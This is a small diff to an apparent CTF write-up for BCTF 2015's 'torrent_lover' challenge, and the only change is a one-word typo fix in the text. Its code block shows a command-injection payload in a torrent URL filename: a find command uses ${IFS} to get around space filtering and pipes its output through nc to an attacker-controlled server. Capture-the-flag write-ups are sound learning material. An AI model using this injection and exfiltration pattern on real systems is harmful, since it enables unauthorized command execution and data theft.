d4rwinb0ts/ctf-writeups/2015-bctf/torrent_lover.md

 ### Find the flag

-First things first, I used the `find` command to file the flag on the server
+First things first, I used the `find` command to look for the flag on the server
 ```
 http://<myserver>/somefile;find${IFS}/${IFS}-name${IFS}*flag*|nc${IFS}<myserver>${IFS}9999;.torrent
 ```